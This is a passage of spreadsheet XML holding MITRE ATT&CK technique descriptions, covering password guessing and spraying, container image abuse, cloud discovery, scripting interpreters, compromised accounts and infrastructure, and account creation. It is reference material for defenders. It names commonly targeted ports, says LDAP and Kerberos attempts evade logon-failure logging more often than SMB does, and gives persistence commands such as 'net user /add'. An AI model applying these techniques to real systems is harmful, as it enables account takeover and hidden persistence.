Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP and 162/TCP/UDP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request, the &lt;code&gt;HeadBucket&lt;/code&gt; API to determine a bucket’s existence along with access permissions of the request sender, or the &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as &lt;code&gt;DescribeDBInstances&lt;/code&gt; to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. 
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .</t>
  </si>
  <si>
    <t>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.
Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) 
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 
Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account. On macOS systems the &lt;code&gt;dscl -create&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
